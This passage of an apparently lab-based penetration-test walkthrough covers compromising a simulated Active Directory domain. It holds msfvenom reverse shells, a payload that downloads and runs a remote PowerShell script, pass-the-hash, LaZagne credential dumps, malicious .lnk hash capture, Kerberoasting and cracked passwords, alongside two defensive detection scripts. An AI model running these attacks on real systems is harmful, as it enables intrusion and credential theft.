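    # Constructed entry with a known password to show the round trip.
    sample = make_keyfile_entry("audit", "example-only", "asadmin",
                                salt=bytes(range(SALT_LEN)))
    print(verify_password(parse_keyfile_entry(sample), "example-only"))
```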
Web Application

172.16.139.3:47001
172.16.139.35:5985
172.16.139.35:10000 (Jenkins)
172.16.139.35:8080 (GlassFish 3.1.2)
172.16.139.35:4848 (GlassFish Administration Console)
Try logging in with the password found in the NFS mount at /mnt/MS01/apps/glassfish/domains/domain1/config/local-password:

```
admin:4DE1087766BC3CCF2EF3FCDE6B95B6686650FC23
```

Exploitation reference: exploiting-glassfish. First generate a malicious WAR package with msfvenom:

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=4444 -f war > evil.war
```

Deploy the malicious WAR file from the Applications page.

After visiting http://172.16.139.35:8080/evil/, the listener receives the reverse shell:

```
root@WEB-NIX01:~# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 172.16.139.35 49875
Microsoft Windows [Version 10.0.17763.3287]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\glassfish3\glassfish\domains\domain1\config> whoami
whoami
ms01\svc_glassfish

C:\glassfish3\glassfish\domains\domain1\config> cd c:\Users\svc_glassfish\Desktop
cd c:\Users\svc_glassfish\Desktop

C:\glassfish3\glassfish\domains\domain1\config> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 49CC-05AB

 Directory of c:\Users\svc_glassfish\Desktop

08/18/2022  12:54 PM    <DIR>          .
08/18/2022  12:54 PM    <DIR>          ..
01/20/2025  06:56 AM                34 flag.txt
               1 File(s)             34 bytes
               2 Dir(s)   8,083,361,792 bytes free

c:\Users\svc_glassfish\Desktop>type flag.txt
type flag.txt
9f82497709b3456c0004a82227a5f9a6
```
Lateral movement

MS01 Privilege Escalation

Use MSF again to get a stable shell:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=1234 -f exe -o win.exe
```

Add listeners in ligolo-ng (2222 for file transfer; 1234 for the MSF handler):

```
[Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:2222 --to 10.10.16.2:2222 --tcp
INFO[3211] Listener 0 created on remote agent!
[Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:1234 --to 10.10.16.2:1234 --tcp
INFO[3903] Listener 3 created on remote agent!
```

Upload the malicious exe to the MS01 machine:

```
c:\Users\svc_glassfish\Desktop> curl -O http://172.16.139.10:2222/win.exe
or
PS c:\Users\svc_glassfish\Desktop> iwr http://172.16.139.10:2222/win.exe -o win.exe
```

Wait until the Metasploit handler is running, then run .\win.exe.

MSF

```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.16.2
set LPORT 1234
run
```
List processes.

In the shell, look up the DcomLaunch service. DcomLaunch manages the DCOM and RPC mechanisms and is a core component that remote code execution relies on.

```
tasklist /FI "SERVICES eq DcomLaunch" /FI "IMAGENAME eq svchost.exe" /V
```

Migrate into this process to escalate privileges.
hashdump
Credential Theft

```
evil-winrm -i 172.16.139.35 -u administrator -H b3a92efa782776e463a52131f7d7fd89
```

Upload the winPEASx64.exe tool:

```
*Evil-WinRM* PS C:\Users\Administrator\Desktop> upload winPEASx64.exe
```

Download the MS01_administrator.peas file with evil-winrm (it contains no directly sensitive information).

Sticky Notes is a small application that ships with Windows.

```
PS C:\Users\pthorpe_adm\AppData\Roaming\Sticky Notes> cat 'StickyNotes.snt'
```

This reveals the IP of the WS01 machine and the devtest user's credentials:

```
172.16.139.175:WS01
devtest:D3vel0PEr@123
```

WS01 Initial Access

Test whether the port is open:

```
$ nmap --open -PE -Pn 172.16.139.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 22:41 EST
Nmap scan report for 172.16.139.175
Host is up (0.37s latency).
Not shown: 999 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 42.30 seconds
```

RDP to the WS01 machine with xfreerdp:

```
xfreerdp /v:172.16.139.175 /u:devtest /p:D3vel0PEr@123 /timeout:20000
```
Privilege Escalation

There are many applications on the desktop.

Running searchsploit against each desktop application, only Wondershare Dr.Fone turns up a privilege escalation vulnerability.

The version is also 12.

Exploit-DB 50912.py:

```python
import msgpackrpc

LADDR = "192.168.14.129"
LPORT = 1338
RADDR = "192.168.14.137"
RPORT = 12345

param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)} "

client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s', 'powershell', param)
```

Modified version:

```python
import msgpackrpc

RADDR = "172.16.139.175"
RPORT = 12345

param = "powershell C:\\Users\\devtest\\desktop\\priesc.exe"

client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT))
result = client.call('system_s', 'powershell', param)
```

Build a windows/x64/meterpreter/reverse_tcp executable with msfvenom:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=54321 -f exe -o priesc.exe
```

Add a listener for root@WEB-NIX01 in the ligolo-ng proxy:

```
[Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:54321 --to 10.10.16.2:54321
INFO[10227] Listener 3 created on remote agent!
```

Upload priesc.exe to the WS01 machine.

Run priesc.py with Python.

The reverse shell received from WS01 runs as SYSTEM:

```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.16.2
set LPORT 54321
run
```
hashdump
Credential Theft

Log in to the WS01 machine with the administrator credentials:

```
xfreerdp /v:172.16.139.175 /u:administrator /pth:0f280efc7d520ce6554f24f6ecee02d0 /timeout:20000
```
limit
In the MSF SYSTEM shell, set Restricted Admin mode to not-disabled (DisableRestrictedAdmin = 0):

```
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
reg query HKLM\System\CurrentControlSet\Control\Lsa | findstr DisableRestrictedAdmin
```
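The `reg add` above is what makes the pass-the-hash RDP login work: with DisableRestrictedAdmin set to 0, Restricted Admin mode is on and an NTLM hash alone opens an RDP session. As an added example that is not part of the writeup, the Python below flags that exact write in Sysmon Event ID 13 (registry value set) records; the events are constructed here in a simplified key=value rendering of Sysmon's EventData (real events are XML/EVTX), and the usernames in them are placeholders.

```python
# Added example (not from the writeup): detect the registry write that enables
# Restricted Admin mode. DisableRestrictedAdmin absent or 1 = mode disabled
# (the default on patched systems), 0 = enabled, which lets an NTLM hash alone
# open an RDP session. Sample events are constructed in a simplified key=value
# rendering of Sysmon Event ID 13; real events are XML/EVTX.
import re

LSA_KEY = r"HKLM\System\CurrentControlSet\Control\Lsa"
# value name -> DWORD data that weakens the host
RISKY_LSA_VALUES = {"DisableRestrictedAdmin": 0}

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
DWORD_RE = re.compile(r"DWORD \((0x[0-9A-Fa-f]{8})\)")

SAMPLE_EVENTS = [  # constructed
    r'EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin Details="DWORD (0x00000000)" User="NT AUTHORITY\SYSTEM"',
    r'EventID=13 Image=C:\Windows\System32\svchost.exe TargetObject=HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel Details="DWORD (0x00000005)" User="NT AUTHORITY\SYSTEM"',
    r'EventID=13 Image=C:\Windows\regedit.exe TargetObject=HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin Details="DWORD (0x00000001)" User="TRILOCOR\admin"',
    r'EventID=12 Image=C:\Windows\System32\reg.exe TargetObject=HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin User="NT AUTHORITY\SYSTEM"',
]


def parse_event(line):
    """key=value pairs, with double quotes around values that contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def risky_lsa_writes(lines):
    """Return the value-set events that put a watched Lsa value in its weak state."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13":          # only value-set events
            continue
        key, _, value = ev.get("TargetObject", "").rpartition("\\")
        if key.lower() != LSA_KEY.lower() or value not in RISKY_LSA_VALUES:
            continue
        m = DWORD_RE.fullmatch(ev.get("Details", ""))
        if m and int(m.group(1), 16) == RISKY_LSA_VALUES[value]:
            hits.append({"value": value, "image": ev.get("Image"),
                         "user": ev.get("User")})
    return hits


if __name__ == "__main__":
    for hit in risky_lsa_writes(SAMPLE_EVENTS):
        print("ALERT: %(value)s set to weak state by %(image)s as %(user)s" % hit)
```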
Connect again with xfreerdp.

Upload LaZagne.exe to WS01 to collect sensitive information.

Run PowerShell as administrator, then execute LaZagne.exe:
```
PS C:\Users\Administrator\Desktop> .\LaZagne.exe

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

[+] System masterkey decrypted for 0af50e35-4750-4f0e-aca7-31f978e440f6
[+] System masterkey decrypted for 203dfb33-394f-41a1-b031-aa5aa00a852e
[+] System masterkey decrypted for 402db628-9b6b-4e40-8926-fbfbb6bb6626
[+] System masterkey decrypted for 914e9895-ebe2-488b-9dd8-d3756a0940a3
[+] System masterkey decrypted for d963f089-8a32-4812-80c6-be17ae237f3e

########## User: SYSTEM ##########

------------------- Hashdump passwords -----------------

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f280efc7d520ce6554f24f6ecee02d0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f3ad5d7948de33a7532f8c8665d2ced6:::
devtest:1002:aad3b435b51404eeaad3b435b51404ee:0dec6c93cf0fb6306f72624ba6d92d0f:::

------------------- Lsa_secrets passwords -----------------

$MACHINE.ACC
<SNIP>
DefaultPassword
<SNIP>
DPAPI_SYSTEM
<SNIP>
NL$KM
<SNIP>

########## User: Administrator ##########

------------------- Credman passwords -----------------

[+] Password found !!!
URL: 172.16.139.35
Login: pthorpe_adm
Password: pTh0Rp3_R0cK

########## User: pthorpe ##########

------------------- Pidgin passwords -----------------

[+] Password found !!!
Login: trilocor\pthorpe
Password: -pl,MKO)9ijn

[+] 2 passwords have been found.
For more information launch it again with the -v option

elapsed time = 8.420691013336182
PS C:\Users\Administrator\Desktop>
```
Two sets of credentials obtained:

```
pthorpe_adm:pTh0Rp3_R0cK
trilocor\pthorpe:-pl,MKO)9ijn
```

A lookup shows that pthorpe is a domain user.

Active Directory

Credential Enumeration

SMB

Enumerate SMB shares with the pthorpe domain user's credentials.

Evil lnk

The Print_jobs share is readable and writable, so try capturing hashes with a malicious .lnk file. On Server 2019 hosts the SCF technique no longer works, but a malicious .lnk file achieves the same effect.
```
$ git clone https://github.com/Greenwolf/ntlm_theft.git
$ cd ntlm_theft
$ python3 ntlm_theft.py -g lnk -s 172.16.139.10 -f evil
```

Upload the generated evil.lnk file to the Print_jobs share.

Upload Inveigh.exe to the MS01 machine to capture the hashes:

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Inveigh.exe
[*] Inveigh 2.0.11 [Started 2025-01-21T04:07:00 | PID 648]
[+] Packet Sniffer Addresses [IP 172.16.139.35 | IPv6 fe80::481:ec1:fd04:d15a%9]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.139.35 | IPv6 fe80::481:ec1:fd04:d15a%9]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Administrator\Documents]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[.] [04:07:15] TCP(8686) SYN packet from 172.16.139.35:50665
[.] [04:08:02] TCP(445) SYN packet from 172.16.139.3:60352
[.] [04:08:02] SMB1(445) negotiation request detected from 172.16.139.3:60352
[.] [04:08:02] SMB2+(445) negotiation request detected from 172.16.139.3:60352
[+] [04:08:02] SMB(445) NTLM challenge [23FFBC3FE00D751C] sent to 172.16.139.35:60352
[+] [04:08:02] SMB(445) NTLMv2 captured for [trilocor\jflemming] from 172.16.139.3(DC01):60352:
[!] [04:08:02] SMB(445) NTLMv2 for [trilocor\jflemming] written to Inveigh-NTLMv2.txt
jflemming::trilocor<SNIP>
<SNIP>v2 captured for [trilocor\bmarley] from 172.16.139.3(DC01):60363:
[!] [04:08:02] SMB(445) NTLMv2 for [trilocor\bmarley] written to Inveigh-NTLMv2.txt
bmarley::trilocor<SNIP>
<SNIP>v2 for [trilocor\bmarley] written to Inveigh-NTLMv2.txt
[!] [04:08:02] SMB(445) NTLMv2 challenge missing for trilocor\gmarley from 172.16.139.3(DC01):60385:
gmarley::trilocor<SNIP>
```

Crack the hashes with hashcat:

```
$ hashcat -m 5600 jflemming.hash /usr/share/wordlists/rockyou.txt
<SNIP>
JFLEMMING::trilocor:42b35df9ae649d73:b9d475eb51efac4a62719e2758a6644f:<SNIP>:$$Bond@007$$

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JFLEMMING::trilocor:42b35df9ae649d73:b9d475eb51efac...000000
Time.Started.....: Tue Jan 21 02:43:04 2025 (15 secs)
Time.Estimated...: Tue Jan 21 02:43:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   979.3 kH/s (0.43ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14329344/14344385 (99.90%)
Rejected.........: 0/14329344 (0.00%)
Restore.Point....: 14328832/14344385 (99.89%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $$mom11121979 -> $$$@@@
Hardware.Mon.#1..: Util: 88%

Started: Tue Jan 21 02:42:49 2025
Stopped: Tue Jan 21 02:43:20 2025
```
BloodHound

In the earlier MSF SYSTEM shell on WS01, add the domain user pthorpe to the local Remote Desktop Users and Administrators groups:

```
net localgroup "Remote Desktop Users" trilocor\pthorpe /add
net localgroup Administrators trilocor\pthorpe /add
```

RDP to the WS01 machine with xfreerdp:

```
xfreerdp /v:172.16.139.175 /u:pthorpe /p:'-pl,MKO)9ijn' /timeout:20000
```

Disable the firewall.

Upload SharpHound.exe to collect domain information.

Start an HTTP server with Python for file transfer.

Upload the PowerView.ps1 script:

```
iwr http://172.16.139.10:2222/PowerView.ps1 -o PowerView.ps1
```

PowerShell's execution policy does not allow running scripts:

```
PS C:\Users\pthorpe\desktop> Import-Module .\PowerView.ps1
Import-Module : File C:\Users\pthorpe\desktop\PowerView.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\PowerView.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
```

Change the execution policy:

```
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
```

GenericWrite

Enumeration shows that the domain user jflemming is a member of the HELP DESK MANA group, which has GenericWrite over the domain user ksalinas. With this right, a fake SPN can be set on the ksalinas account and a targeted Kerberoasting attack performed.

Set a fake SPN on the ksalinas account:

```powershell
$SecPassword = ConvertTo-SecureString '$$Bond@007$$' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('trilocor\jflemming', $SecPassword)
Set-DomainObject -Credential $Cred -Identity ksalinas -SET @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose
```
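The SPN write above is the step a defender can catch: with the Directory Service Changes audit subcategory enabled and a SACL on user objects, every servicePrincipalName value added is logged as Event ID 5136 with the actor and the value. The Python below is an added example, not part of the writeup, that flags SPN additions on user objects whose host is not a trilocor.local name or whose actor is outside an allow-list of SPN maintainers; the events are constructed in a simplified key=value rendering of the 5136 EventData names, and the svc_spnmgr maintainer account and the DNs are hypothetical.

```python
# Added example (not from the writeup): surface servicePrincipalName values
# added to user objects from Directory Service Changes auditing (Event ID 5136).
# Sample events are constructed in a simplified key=value rendering using the
# EventData names of 5136; real events are XML/EVTX and OperationType arrives
# as a message-table token (%%14674 = Value Added, %%14675 = Value Deleted).
import re

DOMAIN_SUFFIX = "trilocor.local"
# Hypothetical allow-list: identities expected to maintain SPNs on user objects.
SPN_MAINTAINERS = {"svc_spnmgr"}
OPERATION_TYPES = {"%%14674": "Value Added", "%%14675": "Value Deleted"}

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

SAMPLE_EVENTS = [  # constructed; DNs are placeholders
    'EventID=5136 SubjectUserName=jflemming ObjectClass=user '
    'ObjectDN="CN=ksalinas,OU=Corp,DC=trilocor,DC=local" '
    'AttributeLDAPDisplayName=servicePrincipalName '
    'AttributeValue=nonexistent/BLAHBLAH OperationType=%%14674',
    'EventID=5136 SubjectUserName=svc_spnmgr ObjectClass=user '
    'ObjectDN="CN=mssqlsvc,OU=Service Accounts,DC=trilocor,DC=local" '
    'AttributeLDAPDisplayName=servicePrincipalName '
    'AttributeValue=MSSQLSvc/DB01.trilocor.local:1433 OperationType="Value Added"',
    'EventID=5136 SubjectUserName=jflemming ObjectClass=user '
    'ObjectDN="CN=ksalinas,OU=Corp,DC=trilocor,DC=local" '
    'AttributeLDAPDisplayName=servicePrincipalName '
    'AttributeValue=nonexistent/BLAHBLAH OperationType=%%14675',
    'EventID=5136 SubjectUserName=WS01$ ObjectClass=computer '
    'ObjectDN="CN=WS01,CN=Computers,DC=trilocor,DC=local" '
    'AttributeLDAPDisplayName=servicePrincipalName '
    'AttributeValue=HOST/WS01.trilocor.local OperationType=%%14674',
]


def parse_event(line):
    """key=value pairs, with double quotes around values that contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def spn_host(spn):
    """Host part of 'class/host[:port][/name]'; empty if the SPN is malformed."""
    parts = spn.split("/")
    return parts[1].split(":", 1)[0].lower() if len(parts) >= 2 else ""


def user_spn_additions(lines, maintainers=SPN_MAINTAINERS, suffix=DOMAIN_SUFFIX):
    """Each SPN added to a *user* object, with the reasons it looks suspicious."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5136":
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "serviceprincipalname":
            continue
        op = ev.get("OperationType", "")
        if OPERATION_TYPES.get(op, op) != "Value Added":
            continue
        if ev.get("ObjectClass", "").lower() != "user":   # computers register their own
            continue
        spn = ev.get("AttributeValue", "")
        reasons = []
        if not spn_host(spn).endswith("." + suffix):
            reasons.append("SPN host is not a %s name" % suffix)
        actor = ev.get("SubjectUserName", "")
        if actor not in maintainers:
            reasons.append("set by %s, not an SPN maintainer" % actor)
        findings.append({"target": ev.get("ObjectDN"), "spn": spn,
                         "actor": actor, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in user_spn_additions(SAMPLE_EVENTS):
        level = "ALERT" if f["reasons"] else "info"
        print(level, f["actor"], "->", f["target"], f["spn"], "; ".join(f["reasons"]))
```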
Perform Kerberoasting:

```
$ impacket-GetUserSPNs trilocor.local/JFLEMMING:'$$Bond@007$$' -dc-ip 172.16.139.3 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName                    Name          MemberOf                                                       PasswordLastSet             LastLogon  Delegation
--------------------------------------  ------------  -------------------------------------------------------------  --------------------------  ---------  ----------
adfsconnect/azure01.trilocor.local      azureconnect                                                                 2022-07-26 08:35:20.785080  <never>
backupjob/veam001.trilocor.local        backupjob                                                                    2022-07-26 08:35:23.910089  <never>
MSSQLSvc/DB01.trilocor.local:1433       mssqlsvc                                                                     2022-07-26 08:34:58.941340  <never>
MSSQLSvc/DEVTEST.trilocor.local:1433    sqltest                                                                      2022-07-26 08:35:11.410091  <never>
MSSQLSvc/QA001.trilocor.local:1433      sqlqa                                                                        2022-07-26 08:35:14.456963  <never>
MSSQLSvc/SQL-DEV01.trilocor.local:1433  sqldev                                                                       2022-07-26 08:35:07.988210  <never>
MSSQLSvc/SQL-WEB01.trilocor.local:1433  mssqladm                                                                     2022-07-26 08:35:17.769457  <never>
MSSQLSvc/SQL01.trilocor.local:1433      svc_sql                                                                      2022-07-26 08:35:02.035096  <never>
MSSQLSvc/SQL02.trilocor.local:1433      sqlprod                                                                      2022-07-26 08:35:04.800708  <never>
nonexistent/BLAHBLAH                    ksalinas      CN=IT Support,OU=Security Groups,OU=Corp,DC=trilocor,DC=local  2022-07-26 08:34:42.691340  <never>
SAP/APP01.trilocor.local                sapsso                                                                       2022-07-26 08:35:30.128840  <never>
SAPsvc/SAP01.trilocor.local             sapvc                                                                        2022-07-26 08:35:32.863210  <never>
vmware/vc.trilocor.local                vmwarescvc                                                                   2022-07-26 08:35:27.050724  <never>

[-] CCache file is not found. Skipping...
<SNIP>
```
888e6c3f118c2905d111178f20fe3f88ea31d91b17b166f688bc95c40289b4d80f43696dcef032b189f60a1e976d93b57fcd19a4b4e58cdd381a710efd1e9dc202513e09d94064980be7eb8b2c616c4985726dc0b08f4 $krb5tgs$23$*ksalinas$TRILOCOR.LOCAL$trilocor.local/ksalinas*$286c1b92de8fffb2cc71d6e9ba30aa83$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 $krb5tgs$23$*sapsso$TRILOCOR.LOCAL$trilocor.local/sapsso*$d08a492a0e903dcb55e6e74a387ded54$e5adcd7120a773eee00657073f37ca8d4dfb9e130f2b789a731a42e5eac8eebe6813f18093656b4e5b3c65c7d38dae7b713f61657f8747a03b3e8100fdd8410fa2e5a35a0a41126155d4f2ab8e1665e8587bcec39b122c57da86e7a0f899089cd6d05e3276712b5245bf056041d771bb159fe016cf883355ff443a001c2fb4fc21306e87140b60a2221d2a7276889417c6c10b2c15503481a349450158136601ee0144e45e800a7c4fc46a01a41d01f720cca488fa2791ffb364bd03373006705eeafd92013773ab2764ab6853bf04870e04de60ca1ae6e586945472df685d2aa8cb6664a859583ca565c1c4ba28e22a2dee068052c47dfc018f7b78355c46a8cd98fe449cb6c077b7cb8f12750d989c631d6ab074a38a3eb597c657200a00b6205234d30be40d52a5447829f8d897a29dc9e532b218e57557683d640cc5671c5d2f02691f568a19470b2f01ecf381d79c01aa51b926c9366a1090387f6c7460b5b9e11727126146a0d6d519833dbc92187e5dde35aecd5febf7d31277a1ec9fdae19ded0781e0c29f223b132f3b86b395743a637c7f68fff4f732a023ce6e44a1020080eefdd2a3d11dc5faf98d6fa7b8489036760f2c0b33b42fc18a32e4ff3cbccc3453d33c8e493ee3b36a7ea8387bc97f1320eb704b6b75683c05e72f8f37234ef64e1e8ee36b04f0e8683ca7d82b0e8eb5f23c2bc76344c6df62cfaad233357b85b5a8e0d8cd6816508f5a2382478e6dfc7c3d30a521bcd0723bdae74b966acede9068eb4e74895bdff0d400c9e7b3f0b9f39930f2d55a9c24b1f09b721b793ac7f4de69b9d995169b8cc1adb1de095897cb381a883ebb9fc7745b6a3d17bd080f0ecf5f1c8088121b3cd76282fa2dabf076ca763f44980726f5a4065a04894b502a8648311315a3164cc879418679535bd88188546f3883553849e6adc4a0629807f3d2ca5522e0ad24828448957030110ed8d6c0cbc07b687e795e134c44e41354efc517e58a9a6ad33b0eb949f3e62ba71f74cf1dc75269a0aca0866da7ccda4c049c8d41f3bbc0b1dc2ac6f328742670191fc7043e985cee750fbbf48c558b41f23961b1879d434028b16cc266b94c63818e5c6a
c5419d267bf034269678adee5a53fe2e3dc7ff9124be631b4216578c7fe114be40eeca485abd0e7d82c9ccc5c737f403b65069617b2e809949895b36af34cf92a21faaa59a39f86f389770a6df58b2e571ece3ee8baf6774ca31fa149ad257785dc0a5b6a2f71d807a74b3a4b5b1c75f1102afb313427331d76ec4b7e38c240eba499f3f1ebe4175b31c22c911ad67faef9f85f544ddb5ac1cec4439a0ae37d76c2167bde78f41e0d3c9fc64e87c0744ea7235de3d7cc432f9a2e86aea08be780dca1a6e00aa1e904f519cfe7811fc810a91c31daad67859f3b51c921da10fcf5680a8d4ce970cbe967c320ba55a9ebd5bbf20e12e566d $krb5tgs$23$*sapvc$TRILOCOR.LOCAL$trilocor.local/sapvc*$0416dfb7a662c9df8574c3e920c39f2d$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 $krb5tgs$23$*vmwarescvc$TRILOCOR.LOCAL$trilocor.local/vmwarescvc*$295832f3e09e01a68c6715131b4b3e21$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
Crack the hashes with hashcat (mode 13100 is Kerberos 5 etype 23 TGS-REP, i.e. RC4 service tickets)
$ hashcat -m 13100 ksalinas-kerberosating.hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: cpu--0x000, 1437/2938 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 13 digests; 13 unique digests, 13 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*sqlqa$TRILOCOR.LOCAL$trilocor.local/sqlqa*$be26e37c5b23dc418bd5f6b484d3851b$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:Password1!
$krb5tgs$23$*ksalinas$TRILOCOR.LOCAL$trilocor.local/ksalinas*$286c1b92de8fffb2cc71d6e9ba30aa83$b61acb3bb009e0420e158dddf996e335363a4ce120171184e2f246ec0c34654ed749405b59e6a211cd334cee1f63855c532c073d71d6721fdcd21bcba95d6df01cbe89f421954f9bfa7db7a0509ce1bf6fb030d05e6acc95c32b167012540a86b4255c0a29bd138e6c94b12563e77b1900826b466fca682fb9452841c2f6d6b0604e6d2eebc4174de629e52d4a515c05124d7525fba2cacf609e220ce5b2cf8a0371e8fadf194bb02be18993375e095c194e2841030fb13179d60b4524ee1a06392eb8d32b5dd6df585b73f95e1cc4dc44b0d0dde2f06848c5d93fd1acfd3d4616c2d262ed40a5dbeccfd63eeee34d0624bcaf2189b3eb7d7b7e07f7247aeba7bc90100688e1bfb9137c547b401743c85bf8729e3b0ba94dacecd9a789ea402c7975bdb7249fef8c9ffa2059c44658146c80f10ea0b449ea6932511ab0403d4dd66d185e9c70ffdf4b5a6a3e0da28c1c0163d97ffeb188640364d07d03057a71fc4087667c878aa511e4dd153658097acab2da763f1e0e6b0c297349fbb9f74ebf8d638331c270d7ca4a726e02907e0b45c1b9e6d7829722fbe25eef3450f11c0c2ca504b874e1f5598bb4824306675073716c353b5755c1e8548e996897bed685b73bdcee3b2b7ed0ba7e135ecdf38de04a9c07e1cf7f32d06bbe4b0ef9e3132429c5c0a4cbb9aeecab16f355053f488c9d9efb7df820973bb00681340bd5c0486deaadf6a71aee739f9ece180f8072f71670574375d14acc3f3d35ecb9b40b8e8dee4c7a77ec9c00e45e0310967e5d015c7a7645163cfda64f110ce0ed8a17be981fa8b827138c382e50abddac5e667d58c2c19058c6f02a038f6e97fd1b36096606ce0990fcdfcada6b5915e0cf7190e5ef5f312d807118e2a8e89d861ff05b6121304d88cb6f4fd5ec077582a10bc7b1861daa1144dfd366dc9fe6e9ef5482ab757df7a2d6fdffd42ea1965f9896c9f26b199f0f37189818081f4e223406a10fa1cc3c9ab3df6af6fa4c5368aa24f35455db65caeaf4f4eed7edb58c44d65cb73267ca2db642845251b64c03a8c6e4a79460fe14edfd9205bc91a2365228a53d6f53b71b950a6bcff52b9c19c149fc9a3626b715e25fe7fc87071a3c6036ac733c72c4f957d110ac2b6765df1d6142339835c28783889f907ab3d3d4afb8a66698cca568a0621331a252f65fd5397f201947805be4899706e6e4b5290a9db630f4d74646ba2652dd5a1104e5fcd411507f153583b7913bd7ec69a5467d79476537be2f52fb3c6a9377cfe36ece25c4503f11476531d6c8541b670cff8660017869fc33d6bc09bedd3b9f218793097b0189dfa88451f19
bf8dce74f1e97aff8ccc623df32788f6015f6dc05b84c27527a75c54838695e7c0716414f80dbd4137ef166803ec610f54ee8e0a3615ffccc9f0948bc8400204956768a39a5e975778383125a66fee368e4a8f8acf4d2de:atm@#5
$krb5tgs$23$*sqldev$TRILOCOR.LOCAL$trilocor.local/sqldev*$1b90fa31a0978dd8606d54a0dd048507$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:1212developer
